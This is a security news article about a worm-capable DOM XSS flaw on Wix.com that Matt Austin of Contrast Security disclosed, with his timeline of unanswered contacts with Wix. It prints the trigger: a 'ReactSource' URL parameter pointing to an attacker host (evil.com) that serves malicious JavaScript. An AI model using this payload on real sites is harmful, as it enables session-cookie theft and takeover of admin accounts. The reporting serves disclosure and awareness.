Have you heard of wix(.)com?
Wix.com is a cloud-based web development platform designed for users to build HTML5 web sites and mobile sites through the use of the company’s online drag and drop tools.
Unfortunately, a serious XSS bug has been discovered on the platform currently endangering millions of websites and users.
Wix(.)com has a serious XSS bug, researcher says
As reported by security researchers, the service hosts millions of websites with 87 million registered users. The scary part is that all users are currently prone to this XSS vulnerability. The latter can be deployed by attackers in a worm-like manner to take over administrator accounts. Once this is done, the attackers obtain full control over the compromised websites.
The XSS vulnerability was disclosed by Matt Austin from Contrast Security. He wrote:
A simple line of code is enough to trigger the bug
The attack can be triggered only by adding a simple redirection command to any URL from wix(.)com. The result is being redirected to malicious JavaScrip. See an example below:
- Add: ?ReactSource=http://evil.com to any URL for any site created on wix.com.
- Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js
These simple lines of codes are enough for the attackers to be sure that their JS is loaded and activated as part of the targeted website, the researcher explains. Attackers are also able to gain access to admin session cookies and resources, a very bad scenario indeed. Whenever a session cookie is harvested, attackers can freely position the DOM XSS in an iframe. This is done to host malicious content on any website administered by an operator.
Upon success, this attack can be leveraged for malware distribution, website modification, cryptocurrency mining, altering account credentials, etc.
What did Wix say?
As for the communication with wix(.)com, the researcher shares the following experience:
Oct 10: Creates Support ticket requesting security contact
Oct 11: Reach out to @wix on twitter to find a security contact. Replied to use standard support. Gave details in created ticket. Ticket page no longer works. https://www.wix.com/support/html5/contact.
Oct 14: Received standard “We are investigating the matter and will follow up as soon as possible” reply from Wix.
Oct 20: Reply to ticket requesting an update. (no response)
Oct 27: Second request for an update. (no response)
On October 28, the researcher finally received a respond which stated that the
group you tried to contact (security) may not exist, or you may not have permission to post messages to the group.
Nonetheless, the CEO of Wix Avishai Abrahami eventually admitted that certain aspects of the platform are based on the WordPress open-source library. He claims that whatever was improved upon was released back to the community, ZDNet reports.